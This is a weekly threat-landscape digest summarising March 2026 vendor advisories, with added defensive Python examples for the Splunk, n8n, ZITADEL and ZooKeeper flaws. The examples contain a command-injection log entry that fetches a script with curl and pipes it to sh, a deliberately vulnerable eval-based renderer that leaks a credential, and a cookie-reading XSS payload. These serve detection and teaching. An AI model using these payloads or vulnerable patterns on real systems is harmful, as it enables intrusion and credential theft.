Weekly Threat Landscape Digest – Week 11

Week 11 continued to demonstrate a dynamic and evolving cybersecurity landscape, with multiple critical vulnerabilities disclosed across enterprise software, cloud services, network infrastructure, and widely used open-source components. Several advisories highlighted the growing risk posed by authentication bypass, remote code execution, and privilege escalation vulnerabilities affecting platforms such as enterprise management systems, identity services, backup infrastructure, and IoT devices. In addition, recent incidents continue to emphasize how threat actors increasingly exploit legitimate administrative tools and identity platforms to conduct destructive operations while evading traditional detection mechanisms. Organizations are advised to maintain strong cyber hygiene by promptly applying security patches, strengthening identity and access management controls, limiting administrative privileges, and enhancing monitoring of abnormal system behavior. Continuous threat intelligence monitoring, proactive vulnerability management, and robust incident response readiness remain essential to mitigate the risk of emerging cyber threats.
- High-Severity RCE Vulnerability in Splunk Enterprise (CVE-2026-20163)
A high-severity vulnerability has been identified in Splunk Enterprise and Splunk Cloud Platform that could allow attackers to execute arbitrary shell commands on affected systems. The issue exists in the /splunkd/__upload/indexing/preview REST API endpoint used when previewing uploaded files before indexing. Due to insufficient input validation, an attacker with a role containing the high-privilege capability edit_cmd could exploit the unarchive_cmd parameter to inject and execute shell commands on the Splunk server. Successful exploitation could lead to remote command execution, unauthorized access, and potential compromise of the affected Splunk environment. The vulnerability is tracked as CVE-2026-20163 with a CVSS score of 8.0 (High).
Affected Versions:
Splunk Enterprise versions below 10.2.0, 10.0.4, 9.4.9, and 9.3.10, and Splunk Cloud Platform versions below 10.2.2510.5, 10.0.2503.12, 10.1.2507.16, and 9.3.2411.124.
Mitigation:
Organizations should update Splunk Enterprise and Splunk Cloud Platform to the fixed versions released by Splunk. It is also recommended to restrict access to high-privilege capabilities such as edit_cmd, apply least-privilege access controls, and monitor Splunk logs for unusual REST API activity or command execution attempts.
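Two checks follow from the advisory: which roles actually end up with edit_cmd (Splunk resolves capabilities through importRoles, so a role can inherit it without naming it), and whether the preview endpoint has been hit with an unarchive_cmd value that looks like a shell pipeline. The script below is an added example, not Splunk's code or part of the advisory; the authorize.conf excerpt and the splunkd_access.log-style lines are constructed, and it assumes the parameter is visible in the logged request URI (in a real investigation correlate with the request body or audit.log instead).

```python
import configparser
import re
from urllib.parse import parse_qs, urlsplit

# Constructed authorize.conf excerpt (illustrative, not from a real deployment).
AUTHORIZE_CONF = """
[role_user]
search = enabled

[role_power]
importRoles = user
schedule_search = enabled

[role_onboarding]
importRoles = power
edit_cmd = enabled

[role_admin]
importRoles = power
admin_all_objects = enabled
edit_cmd = enabled
"""


def effective_capabilities(conf_text):
    """Return {role: set(capabilities)} with importRoles inheritance resolved."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep capability names as written (case-sensitive)
    cp.read_string(conf_text)
    roles = {s[len("role_"):]: dict(cp[s]) for s in cp.sections() if s.startswith("role_")}

    def resolve(name, seen):
        caps = set()
        if name not in roles or name in seen:
            return caps
        seen.add(name)
        stanza = roles[name]
        for parent in stanza.get("importRoles", "").split(";"):
            if parent.strip():
                caps |= resolve(parent.strip(), seen)
        caps |= {k for k, v in stanza.items()
                 if k != "importRoles" and v.strip().lower() == "enabled"}
        return caps

    return {r: resolve(r, set()) for r in roles}


def roles_with(conf_text, capability):
    """Roles that hold `capability` directly or through importRoles."""
    return sorted(r for r, caps in effective_capabilities(conf_text).items() if capability in caps)


PREVIEW_PATH = "/splunkd/__upload/indexing/preview"
SHELL_META = re.compile(r"[;&|`$<>]")

# Constructed splunkd_access.log-style lines; the query string carries the
# parameter here purely for illustration.
ACCESS_LOG = [
    '10.0.0.5 - analyst [12/Mar/2026:09:14:02.123 +0000] "GET /services/search/jobs HTTP/1.1" 200 4096 - - - 3ms',
    '10.0.0.9 - onboard_svc [12/Mar/2026:09:15:40.002 +0000] "POST /splunkd/__upload/indexing/preview?unarchive_cmd=gzip%20-dc HTTP/1.1" 200 512 - - - 12ms',
    '198.51.100.7 - onboard_svc [12/Mar/2026:09:16:11.456 +0000] "POST /splunkd/__upload/indexing/preview?unarchive_cmd=gzip%20-dc%3Bcurl%20http%3A%2F%2F198.51.100.7%2Fx%7Csh HTTP/1.1" 200 512 - - - 40ms',
]
LOG_RE = re.compile(r'^(?P<ip>\S+) - (?P<user>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')


def suspicious_preview_requests(lines):
    """(user, ip, unarchive_cmd) for preview requests whose unarchive_cmd contains shell metacharacters."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("uri"))
        if url.path != PREVIEW_PATH:
            continue
        cmd = parse_qs(url.query).get("unarchive_cmd", [""])[0]
        if SHELL_META.search(cmd):
            hits.append((m.group("user"), m.group("ip"), cmd))
    return hits


if __name__ == "__main__":
    print("roles with edit_cmd:", roles_with(AUTHORIZE_CONF, "edit_cmd"))
    for hit in suspicious_preview_requests(ACCESS_LOG):
        print("suspicious preview request:", hit)
```

The role audit is the part worth running before patching: a legitimate "gzip -dc" value is not a finding, but any account outside the admin role that can reach edit_cmd is exposure the fix does not remove.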
Reference:
https://advisory.splunk.com/advisories/SVD-2026-0302
- Critical Remote Code Execution Vulnerabilities in n8n (CVE-2026-27493, CVE-2026-27577)
Security researchers have identified two critical vulnerabilities affecting the workflow automation platform n8n that could allow attackers to execute arbitrary commands on affected servers and potentially compromise sensitive credentials stored within the platform.
The first vulnerability, CVE-2026-27493, is an unauthenticated zero-click remote code execution flaw in n8n Form nodes caused by a double-evaluation issue in the expression engine. When a multi-step form renders user input back to the submitter through an HTML rendering step, the input may be interpreted and evaluated twice as an expression. This allows attackers to inject malicious expressions that can execute arbitrary shell commands on the server. The vulnerability has a CVSS v4.0 score of 9.5 (Critical) and can be exploited remotely without authentication through public multi-step form endpoints.
The second vulnerability, CVE-2026-27577, is a sandbox escape flaw in the n8n expression compiler caused by a missing case in the Abstract Syntax Tree (AST) rewriter. Certain expression structures such as SpreadElement are not properly transformed, allowing attackers to bypass sandbox protections and interact directly with the underlying Node.js environment. This vulnerability has a CVSS v4.0 score of 9.4 (Critical) and can allow attackers with limited privileges to execute system-level commands on affected servers.
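The first flaw is a bug class worth seeing in miniature: a template engine that renders a step, then hands the rendered output back to the engine as if it were a template. The model below is an added example written for this digest, not n8n's expression engine or code from the advisory; the engine is a deliberately simplified stand-in (a Python expression over a context dict), and the workflow context, credential and form submission are constructed. In n8n the second evaluation reaches the Node.js runtime, which is why the advisory talks about shell commands; here it reaches a stored credential, which is the same trust boundary violated.

```python
import html
import re

EXPR = re.compile(r"\{\{(.*?)\}\}", re.S)


def evaluate(expr, ctx):
    """Stand-in for a workflow expression engine (hypothetical simplification):
    a Python expression evaluated over the context dict, with no builtins."""
    return str(eval(expr, {"__builtins__": {}}, dict(ctx)))


def render(template, ctx):
    """Replace every {{ ... }} in `template` with its evaluated value."""
    return EXPR.sub(lambda m: evaluate(m.group(1).strip(), ctx), template)


# The form step's own template: the only place expressions should come from.
STEP_TEMPLATE = "<p>Thanks, {{ form['name'] }}. We will reply to {{ form['email'] }}.</p>"


def render_vulnerable(form, workflow_ctx):
    # Pass 1: the form step resolves its expressions; submitted values land in
    # the output as raw text.
    page = render(STEP_TEMPLATE, {"form": form})
    # Pass 2 (the flaw): the HTML step runs the engine over the ALREADY rendered
    # page with the workflow's full context, so {{ }} inside the submitted values
    # is now evaluated as an expression with that context's reach.
    return render(page, {"form": form, **workflow_ctx})


def render_fixed(form, workflow_ctx):
    # Evaluate once, from the template only; workflow_ctx is never exposed to the
    # rendered page. Submitted values are inserted as inert text: HTML-escaped,
    # with "{{" neutralised so a later HTML step cannot reinterpret them even if
    # it is re-rendered by mistake.
    safe_form = {k: html.escape(v).replace("{{", "{&#123;") for k, v in form.items()}
    return render(STEP_TEMPLATE, {"form": safe_form})


# Constructed data: a workflow context holding a credential, and a submission
# whose "name" field is an expression aimed at that credential.
WORKFLOW_CTX = {"credentials": {"smtp_password": "constructed-secret"}}
ATTACKER_FORM = {"name": "{{ credentials['smtp_password'] }}", "email": "x@example.com"}

if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(ATTACKER_FORM, WORKFLOW_CTX))
    print("fixed:     ", render_fixed(ATTACKER_FORM, WORKFLOW_CTX))
```

The second flaw (the AST rewriter that misses SpreadElement) is the compile-time cousin of the same mistake: a sandbox that rewrites expressions node by node is only as complete as its list of node types, so any construct the rewriter does not know about passes through to the host runtime untouched.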
Patched Versions:
n8n versions 2.10.1, 2.9.3, and 1.123.22 or later.
Mitigation:
Organizations using n8n should upgrade immediately to the patched versions. It is also recommended to restrict exposure of public workflow endpoints, review access controls for workflow execution, and monitor systems for suspicious expression injections or abnormal workflow activity.
References:
https://nvd.nist.gov/vuln/detail/CVE-2026-27493
https://nvd.nist.gov/vuln/detail/CVE-2026-27577
- Google Chrome Security Update Fixes Multiple Vulnerabilities (CVE-2026-3913 and others)
Google has released security updates for Chrome version 146 addressing 29 vulnerabilities affecting Windows, macOS, and Linux platforms. The update includes one critical vulnerability and multiple high-severity flaws, many of which are related to memory handling issues such as heap buffer overflows, integer overflows, out-of-bounds reads, and use-after-free (UAF) conditions that could potentially lead to browser crashes or arbitrary code execution.
The critical vulnerability CVE-2026-3913 is a heap buffer overflow issue in the WebML component. Several high-severity vulnerabilities were also addressed, including CVE-2026-3914 (integer overflow in WebML), CVE-2026-3915 (heap buffer overflow in WebML), CVE-2026-3916 (out-of-bounds read in Web Speech), CVE-2026-3917 (use-after-free in Agents), CVE-2026-3918 (use-after-free in WebMCP), CVE-2026-3919 (use-after-free in Extensions), CVE-2026-3920 (out-of-bounds memory access in WebML), CVE-2026-3921 (use-after-free in TextEncoding), CVE-2026-3922 (use-after-free in MediaStream), CVE-2026-3923 (use-after-free in WebMIDI), and CVE-2026-3924 (use-after-free in WindowDialog).
Fixed Versions:
Chrome 146.0.7680.71 (Linux) and 146.0.7680.71 / 146.0.7680.72 (Windows and macOS).
Mitigation:
Users and organizations are advised to update Google Chrome to the latest stable version to mitigate the identified vulnerabilities and reduce the risk of exploitation.
Reference:
https://chromereleases.googleblog.com/2026/03/stable-channel-update-fordesktop_10.html
- Multiple Vulnerabilities in HPE Aruba Networking AOS-CX (CVE-2026-23813 – CVE-2026-23817)
Multiple security vulnerabilities have been identified in HPE Aruba Networking AOS-CX software that could allow attackers to bypass authentication, execute unauthorized commands, or manipulate URLs in the web management interface. Successful exploitation could lead to unauthorized administrative access, command execution, or redirection of users to attacker-controlled websites.
The most critical vulnerability, CVE-2026-23813 (CVSS 9.8), is an authentication bypass flaw in the AOS-CX web-based management interface that could allow an unauthenticated remote attacker to bypass authentication and potentially reset the administrator password. Other vulnerabilities include CVE-2026-23814 (CVSS 8.8), a command injection flaw in an AOS-CX CLI command that may allow a low-privileged authenticated attacker to inject malicious commands, and CVE-2026-23815 and CVE-2026-23816 (CVSS 7.2), which may allow privileged users to execute unauthorized or arbitrary commands on the underlying operating system through the CLI. Additionally, CVE-2026-23817 (CVSS 6.5) is an open redirect vulnerability in the web interface that could redirect users to malicious websites.
Affected Versions:
AOS-CX 10.17.xxxx (10.17.0001 and earlier), 10.16.xxxx (10.16.1020 and earlier), 10.13.xxxx (10.13.1160 and earlier), and 10.10.xxxx (10.10.1170 and earlier). The vulnerabilities impact multiple Aruba CX switch platforms including the 10000, 4100i, 6000, 6100, 6200F, 6300, 6400, 8320, 8325, 8360, 8400, and 9300 series.
Mitigation:
Organizations are advised to upgrade to the patched versions AOS-CX 10.17.1001, 10.16.1030, 10.13.1161, and 10.10.1180 or later and restrict access to management interfaces while applying strong authentication and monitoring administrative activities.
Reference:
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05027en_us&docLocale=en_US
- Multiple Vulnerabilities in Cisco IOS XR and Cisco Contact Center Products
Cisco has released security updates addressing multiple vulnerabilities affecting Cisco IOS XR Software and Cisco Contact Center products. These vulnerabilities could allow attackers to cause denial-of-service (DoS) conditions, privilege escalation, or cross-site scripting (XSS) attacks in affected environments. Successful exploitation could disrupt network operations, allow unauthorized privilege escalation, or enable malicious scripts to execute within web interfaces.
One vulnerability, CVE-2026-20118 (High), affects the Cisco IOS XR Egress Packet Network Interface Aligner and could allow specially crafted traffic to trigger a denial-of-service condition on affected devices. Another flaw, CVE-2026-20074 (High), exists in the Multi-Instance IS-IS feature of Cisco IOS XR Software and may allow crafted protocol traffic to cause a DoS condition. Additionally, CVE-2026-20040 and CVE-2026-20046 (High) are CLI privilege escalation vulnerabilities that could allow a locally authenticated attacker to gain elevated privileges through the command-line interface. Two medium-severity vulnerabilities, CVE-2026-20116 and CVE-2026-20117, affect Cisco Contact Center products and could allow attackers to inject malicious scripts into web interfaces leading to cross-site scripting attacks.
Mitigation:
Organizations are advised to apply the security updates and mitigation measures provided by Cisco and monitor systems for abnormal network traffic, unauthorized CLI activities, or suspicious web interface interactions.
Reference:
https://sec.cloudapps.cisco.com/security/center/publicationListing.x
- High-Severity Privilege Escalation Vulnerability in Ivanti Desktop and Server Management (CVE-2026-3483)
A high-severity vulnerability has been identified in Ivanti Desktop and Server Management (DSM) that could allow a locally authenticated attacker to escalate privileges on affected systems. The vulnerability, tracked as CVE-2026-3483 (CVSS 7.8 – High), is classified as CWE-749 (Exposed Dangerous Method): a method that should not be reachable by low-privileged callers is exposed by Ivanti DSM. An attacker with local access could exploit this flaw to gain elevated privileges, potentially allowing unauthorized access, modification of sensitive data, or disruption of system operations.
Affected Versions:
Ivanti Desktop and Server Management (DSM) 2026.1 and earlier.
Mitigation:
Organizations are advised to update Ivanti DSM to version 2026.1.1 or later, apply the latest security patches, and monitor systems for suspicious privilege escalation attempts or abnormal administrative activity.
Reference:
https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-DSM-CVE-2026-3483?language=en_US
- Microsoft March 2026 Security Updates Address Multiple Vulnerabilities
Microsoft has released its March 2026 Patch Tuesday updates addressing multiple vulnerabilities across several products and services. The update includes two publicly disclosed zero-day vulnerabilities, a critical remote code execution flaw, and several other security issues that could lead to privilege escalation, denial-of-service, remote code execution, or information disclosure in affected environments.
Two zero-day vulnerabilities were disclosed. CVE-2026-21262 is a SQL Server elevation of privilege vulnerability that could allow an authorized attacker to elevate privileges to SQLAdmin over a network due to improper access control. CVE-2026-26127 is a denial-of-service vulnerability in Microsoft .NET caused by an out-of-bounds read condition that could allow an unauthenticated attacker to disrupt services remotely.
A critical vulnerability, CVE-2026-21536, affects the Microsoft Devices Pricing Program and could allow remote code execution on affected systems, potentially leading to system compromise.
Other notable vulnerabilities include CVE-2026-26110 and CVE-2026-26113, which are remote code execution vulnerabilities in Microsoft Office that can be triggered through the Preview Pane, allowing malicious content to execute without requiring the user to open the file. Additionally, CVE-2026-26144 is an information disclosure vulnerability in Microsoft Excel that could expose sensitive information and potentially enable data exfiltration through integration with Microsoft Copilot.
Mitigation:
Organizations are advised to apply the latest Microsoft March 2026 security updates across affected systems and ensure timely patch management to reduce the risk of exploitation.
Reference:
https://msrc.microsoft.com/update-guide/releaseNote/2026-Mar
- Multiple High-Severity Vulnerabilities in Fortinet Products (CVE-2026-24018, CVE-2025-54820, CVE-2026-24017, CVE-2026-22627)
Fortinet has disclosed multiple high-severity vulnerabilities affecting FortiManager, FortiWeb, FortiClient Linux, and FortiSwitch AXFixed products. These flaws could allow attackers to perform local privilege escalation, bypass authentication rate limits for brute-force attacks, execute unauthorized commands, or achieve code execution depending on the affected product and deployment.
The vulnerabilities include CVE-2026-24018 (CVSS 7.4), a symlink-following flaw in FortiClient Linux that may allow a local unprivileged user to escalate privileges to root; CVE-2025-54820 (CVSS 7.0), a stack-based buffer overflow in the FortiManager fgtupdates service that may allow a remote unauthenticated attacker to execute unauthorized commands if the service is enabled; CVE-2026-24017 (CVSS 7.3), an authentication rate-limit bypass vulnerability in FortiWeb that could enable brute-force attacks against admin logins through crafted requests; and CVE-2026-22627 (CVSS 7.7), a classic buffer overflow in the LLDP OUI field of FortiSwitch AXFixed that may allow an unauthenticated attacker on the adjacent network to execute unauthorized code or commands via a crafted LLDP packet.
Affected Versions:
FortiClient Linux 7.4.0 through 7.4.4 and 7.2.2 through 7.2.12; FortiManager 7.4.0 through 7.4.2, 7.2.0 through 7.2.10, and all 6.4 versions; FortiWeb 8.0.0 through 8.0.2, 7.6.0 through 7.6.5, 7.4.0 through 7.4.10, 7.2.0 through 7.2.11, and 7.0.0 through 7.0.11; and FortiSwitch AXFixed 1.0.0 through 1.0.1.
Mitigation:
Organizations should upgrade affected Fortinet products to the fixed versions or latest available releases, review exposure of vulnerable services, and monitor for suspicious login attempts, crafted network packets, or abnormal administrative activity.
References:
https://fortiguard.fortinet.com/psirt/FG-IR-26-083
https://fortiguard.fortinet.com/psirt/FG-IR-25-098
https://fortiguard.fortinet.com/psirt/FG-IR-25-082
https://fortiguard.fortinet.com/psirt/FG-IR-25-086
- Multiple Security Vulnerabilities in Adobe Products
Adobe has released multiple security updates addressing critical and important vulnerabilities across several products including Adobe DNG SDK, Substance 3D Stager, Premiere Pro, Illustrator, Acrobat/Reader, Adobe Commerce, Adobe Commerce B2B, and Magento Open Source. These vulnerabilities could allow attackers to perform arbitrary code execution, privilege escalation, denial-of-service, or security feature bypass in affected environments.
Several vulnerabilities involve memory corruption issues such as out-of-bounds writes, buffer overflows, and use-after-free flaws, which may lead to arbitrary code execution. Notable vulnerabilities include CVE-2026-27280 (Out-of-bounds Write) and CVE-2026-27281 (Integer Overflow) in Adobe DNG SDK, multiple critical flaws in Adobe Substance 3D Stager including CVE-2026-27273 to CVE-2026-27279, CVE-2026-27269 in Adobe Premiere Pro, and several vulnerabilities in Adobe Illustrator including CVE-2026-21333, CVE-2026-21362, CVE-2026-27271, CVE-2026-27272, and CVE-2026-27267 which could allow arbitrary code execution through memory corruption.
Additional vulnerabilities were addressed in Adobe Acrobat and Acrobat Reader, including CVE-2026-27220 and CVE-2026-27278 (Use-After-Free) that may allow arbitrary code execution, and CVE-2026-27221, which could allow privilege escalation through improper verification of cryptographic signatures.
Adobe Commerce, Adobe Commerce B2B, and Magento Open Source were also affected by several vulnerabilities including stored cross-site scripting, authorization bypass, server-side request forgery (SSRF), path traversal, and security feature bypass flaws such as CVE-2026-21290, CVE-2026-21361, CVE-2026-21284, CVE-2026-21311, CVE-2026-21289, and CVE-2026-21309, which may allow attackers to escalate privileges or execute malicious actions in web environments.
Mitigation:
Organizations are advised to apply the latest security updates released by Adobe for the affected products and ensure systems are running the latest supported versions.
References:
https://helpx.adobe.com/security/products/dng-sdk/apsb26-30.html
https://helpx.adobe.com/security/products/substance3d_stager/apsb26-29.html
https://helpx.adobe.com/security/products/premiere_pro/apsb26-28.html
https://helpx.adobe.com/security/products/acrobat/apsb26-26.html
https://helpx.adobe.com/security/products/illustrator/apsb26-18.html
https://helpx.adobe.com/security/products/magento/apsb26-05.html
- Critical Cross-Site Scripting Vulnerability in ZITADEL (CVE-2026-29191)
A critical vulnerability has been identified in ZITADEL, an open-source Identity and Access Management (IAM) platform used for authentication services such as Single Sign-On (SSO) and Multi-Factor Authentication (MFA). The vulnerability could allow attackers to execute malicious scripts through a crafted link, potentially leading to unauthorized access to user accounts.
The flaw, tracked as CVE-2026-29191 (CVSS 9.3 – Critical), exists in the Login V2 interface, specifically in the /saml-post endpoint responsible for processing SAML Identity Provider (IdP) requests. Due to improper validation of user-supplied parameters, malicious input can be reflected in the server response, resulting in a cross-site scripting (XSS) condition. Successful exploitation may allow an unauthenticated attacker to execute malicious JavaScript within a victim’s session, potentially enabling actions such as password resets, session hijacking, or account takeover.
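The SAML POST binding is a natural place for reflected XSS: the server answers a request by rendering an auto-submitting HTML form whose hidden fields are copied from parameters it just received. The example below is added here and is not ZITADEL's code; the page does not say which parameter is reflected, so RelayState is used as the illustration, and the ACS URL, SAMLRequest value and payload are constructed. It shows the reflecting renderer beside one that validates each parameter against what the binding allows (an https ACS URL from registered metadata, base64 for SAMLRequest, at most 80 bytes of RelayState) and HTML-escapes before interpolating.

```python
import html
import re

B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def saml_post_form_vulnerable(acs_url, saml_request_b64, relay_state):
    """Reflects the request parameters verbatim into the auto-submit form (the bug class)."""
    return (
        f'<form id="f" method="post" action="{acs_url}">'
        f'<input type="hidden" name="SAMLRequest" value="{saml_request_b64}">'
        f'<input type="hidden" name="RelayState" value="{relay_state}">'
        '</form><script>document.getElementById("f").submit();</script>'
    )


def saml_post_form_fixed(acs_url, saml_request_b64, relay_state):
    """Validates each parameter against what the SAML binding allows, then HTML-escapes."""
    if not acs_url.startswith("https://"):
        raise ValueError("ACS URL must be an https URL taken from the registered IdP metadata")
    if not B64.match(saml_request_b64):
        raise ValueError("SAMLRequest must be base64")
    if len(relay_state.encode()) > 80:  # the SAML bindings spec caps RelayState at 80 bytes
        raise ValueError("RelayState too long")

    def esc(value):
        return html.escape(value, quote=True)  # neutralises < > & " ' in an attribute context

    return (
        f'<form id="f" method="post" action="{esc(acs_url)}">'
        f'<input type="hidden" name="SAMLRequest" value="{esc(saml_request_b64)}">'
        f'<input type="hidden" name="RelayState" value="{esc(relay_state)}">'
        '</form><script>document.getElementById("f").submit();</script>'
    )


# Constructed inputs: a breakout payload that closes the value attribute and the input tag.
ACS_URL = "https://idp.example.com/sso"
SAML_REQUEST = "PHNhbWxwOkF1dGhuUmVxdWVzdC8+"
PAYLOAD = '"><script>alert(document.cookie)</script>'

if __name__ == "__main__":
    print(saml_post_form_vulnerable(ACS_URL, SAML_REQUEST, PAYLOAD))
    print(saml_post_form_fixed(ACS_URL, SAML_REQUEST, PAYLOAD))
```

The inline submit script in both variants is itself a reason to serve the page with a Content-Security-Policy that uses a nonce for that one script; escaping stops the reflected payload from becoming markup, and the policy stops any reflected script from running if escaping is ever missed.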
Affected Versions:
ZITADEL 4.0.0 through 4.11.1.
Mitigation:
Organizations using ZITADEL are advised to upgrade to version 4.12.0 or later, apply the latest security patches, and monitor authentication systems for suspicious login activity or unusual SAML request behavior.
Reference:
https://nvd.nist.gov/vuln/detail/CVE-2026-29191
- Multiple Critical Vulnerabilities in HP Device Manager
Multiple security vulnerabilities have been identified in HP Device Manager (HPDM) that could allow attackers to compromise affected systems. The vulnerabilities impact HPDM versions prior to 5.0.16 and originate from several integrated components and third-party libraries used within the platform. Successful exploitation could lead to remote code execution, privilege escalation, denial-of-service (DoS), and sensitive information disclosure.
Several critical vulnerabilities have been identified including CVE-2023-38545 (CVSS 9.8) affecting the cURL component, CVE-2025-55754 (CVSS 9.6) affecting Apache Tomcat, and CVE-2025-23048 (CVSS 9.1) affecting Apache HTTP Server. These vulnerabilities could allow attackers to exploit underlying services within HP Device Manager and gain unauthorized control over affected systems.
Affected Versions:
HP Device Manager all versions prior to 5.0.16.
Mitigation:
Organizations are advised to upgrade HP Device Manager to version 5.0.16 or later, apply security patches, and review system logs for suspicious activity or abnormal service behavior.
Reference:
https://support.hp.com/nz-en/document/ish_14442335-14442364-16/hpsbhf04092
- Critical Vulnerability in Nginx UI (CVE-2026-27944)
A critical vulnerability has been identified in Nginx UI that could allow unauthenticated attackers to download and decrypt full system backups from affected servers. The vulnerability, tracked as CVE-2026-27944 (CVSS 9.8 – Critical), may expose sensitive data including user credentials, system configuration files, session tokens, and SSL/TLS private keys, potentially leading to full compromise of the affected server environment.
The flaw allows attackers to retrieve backup files without authentication and decrypt them, which could enable access to critical infrastructure information and administrative credentials.
Affected Versions:
Nginx UI versions prior to 2.3.2.
Mitigation:
Organizations using Nginx UI are advised to upgrade to version 2.3.3 or later, restrict access to management interfaces, and review systems for any unauthorized backup access or suspicious activity.
Reference:
https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-g9w5-qffc-6762
- SAP Security Patch Day – March 2026 Updates
SAP has released 15 security notes as part of its March 2026 Security Patch Day, addressing vulnerabilities across multiple enterprise products including SAP NetWeaver, Supply Chain Management, Business One, Business Warehouse, and SAP GUI. The updates include 2 critical, 1 high, 11 medium, and 1 low severity vulnerabilities, with the most severe issues potentially allowing code injection, insecure deserialization, and denial-of-service attacks.
One critical vulnerability, CVE-2019-17571 (CVSS 9.8), the long-known deserialization flaw in Apache Log4j 1.x, affects SAP Quotation Management Insurance (FS-QUO 800); SAP classifies the note as code injection, and exploitation could allow attackers to execute malicious code. Another critical vulnerability, CVE-2026-27685 (CVSS 9.1), affects SAP NetWeaver Enterprise Portal Administration (EP-RUNTIME 7.50) and is caused by insecure deserialization, which could allow attackers to compromise the system.
A high-severity vulnerability, CVE-2026-27689 (CVSS 7.7), impacts SAP Supply Chain Management, where attackers could exploit the flaw to trigger a denial-of-service condition affecting system availability.
Affected Versions:
SAP Supply Chain Management (CVE-2026-27689): SCMAPO 713, 714; S4CORE 102–104; S4COREOP 105–109; and SCM 700–712. Affected versions for the other notes are listed in the individual SAP security notes.
Mitigation:
SAP recommends applying the latest security notes and patches immediately, prioritizing critical and high-severity vulnerabilities to reduce the risk of exploitation in production environments.
Reference:
https://support.sap.com/en/my-support/knowledge-base/security-notes-news/march2026.html
- Security Bypass and Information Disclosure Vulnerabilities in Apache ZooKeeper (CVE-2026-24281, CVE-2026-24308)
Multiple vulnerabilities have been identified in Apache ZooKeeper, a widely used open-source service that provides configuration management, naming services, and synchronization for distributed applications. These vulnerabilities could allow attackers to bypass hostname verification mechanisms and expose sensitive information stored in configuration files or system logs.
The first vulnerability, CVE-2026-24281, affects the ZKTrustManager component and involves improper certificate validation, which could allow attackers to bypass hostname verification and impersonate trusted hosts during secure communications. Another vulnerability, CVE-2026-24308, affects the ZKConfig component and could expose sensitive secrets through system logs, potentially allowing attackers to retrieve credentials or other confidential information.
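The page does not say what ZKTrustManager got wrong, but the hostname-verification rules a trust manager must enforce are fixed (RFC 6125 style), so they can be stated as a reference function against which a custom TrustManager can be sanity-checked. The matcher below is an added example written for this digest, not ZooKeeper code; it checks the peer name only against the certificate's subjectAltName entries (no CN fallback), allows a wildcard only as the complete left-most label matching exactly one label, and requires IP-literal peers to match an IP SAN rather than a DNS SAN. The SAN lists in the tests are constructed.

```python
import ipaddress


def _dns_label_match(pattern, hostname):
    """pattern and hostname are lowercase DNS names without a trailing dot."""
    if "*" not in pattern:
        return pattern == hostname
    p_labels = pattern.split(".")
    h_labels = hostname.split(".")
    # Wildcard only as the whole left-most label ("zk*.example.com" is rejected),
    # with at least two labels after it so "*.com" can never match.
    if p_labels[0] != "*" or len(p_labels) < 3 or any("*" in lab for lab in p_labels[1:]):
        return False
    if len(h_labels) != len(p_labels):
        return False  # "*" matches exactly one label, never "a.b"
    return p_labels[1:] == h_labels[1:]


def hostname_matches(sans, host):
    """sans: list of (kind, value) with kind "DNS" or "IP", as taken from the peer
    certificate's subjectAltName extension. Returns True only on a positive match."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None
    if ip is not None:
        # An IP-literal peer must appear as an IP SAN; a DNS SAN spelling the
        # same digits does not count.
        return any(kind == "IP" and ipaddress.ip_address(value) == ip for kind, value in sans)
    wanted = host.lower().rstrip(".")
    return any(kind == "DNS" and _dns_label_match(value.lower().rstrip("."), wanted)
               for kind, value in sans)


if __name__ == "__main__":
    sans = [("DNS", "*.zk.example.com"), ("IP", "10.0.0.7")]  # constructed
    for peer in ("zk1.zk.example.com", "a.zk1.zk.example.com", "10.0.0.7", "10.0.0.8"):
        print(peer, hostname_matches(sans, peer))
```

A TrustManager that verifies the chain but never calls something like this against the connected peer name is exactly what lets a valid certificate for one host be presented by another.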
Affected Versions:
ZooKeeper 3.9.0 through 3.9.4 and 3.8.0 through 3.8.5.
Mitigation:
Organizations are advised to upgrade Apache ZooKeeper to the patched versions 3.9.5 or 3.8.6, apply security updates, and review system logs to ensure sensitive information is not exposed.
References:
https://nvd.nist.gov/vuln/detail/CVE-2026-24281
https://www.tenable.com/cve/CVE-2026-24308
- Actively Exploited Privilege Escalation Vulnerability in Hikvision IP Cameras (CVE-2017-7921)
A critical vulnerability has been identified in multiple Hikvision IP camera models that could allow attackers to bypass authentication and escalate privileges on affected devices. The vulnerability, tracked as CVE-2017-7921, affects the web interface of Hikvision IP cameras and is listed in CISA's Known Exploited Vulnerabilities (KEV) catalog, indicating active exploitation by threat actors.
The flaw allows attackers to bypass authentication mechanisms and gain elevated privileges on vulnerable devices. Successful exploitation could allow attackers to access sensitive device information, modify configurations, or tamper with camera operations, potentially compromising surveillance infrastructure.
Affected Products:
Several Hikvision camera series including DS-2CD2xx2F-I, DS-2CD2xx0F-I, DS-2CD2xx2FWD, DS-2CD4x2xFWD, DS-2CD4xx5, DS-2DFx Series, and DS-2CD63xx Series running firmware versions between V5.0.x and V5.4.x depending on the model.
Mitigation:
Organizations are advised to upgrade affected devices to the latest firmware versions, verify firmware across all deployed cameras, avoid exposing surveillance devices directly to the internet, segment camera networks, restrict management access through VPN or secure internal networks, and enforce strong administrative password policies.
- Multiple Vulnerabilities in AWS-LC Cryptographic Library (CVE-2026-3336, CVE-2026-3337, CVE-2026-3338)
Multiple vulnerabilities have been identified in AWS-LC, an open-source cryptographic library used by various AWS services and applications for encryption and certificate validation. Successful exploitation could allow attackers to bypass certificate or signature validation mechanisms or perform timing side-channel analysis, potentially compromising cryptographic verification processes.
The vulnerabilities include CVE-2026-3336, a certificate chain validation bypass in the PKCS7_verify function that may allow attackers to bypass certificate chain verification when processing PKCS7 objects with multiple signers. Another flaw, CVE-2026-3337, involves a timing side-channel vulnerability in AES-CCM tag verification, where timing discrepancies during decryption could allow attackers to infer authentication tag validity. Additionally, CVE-2026-3338 is a signature validation bypass in PKCS7_verify, which could allow attackers to bypass signature verification when processing PKCS7 objects with authenticated attributes.
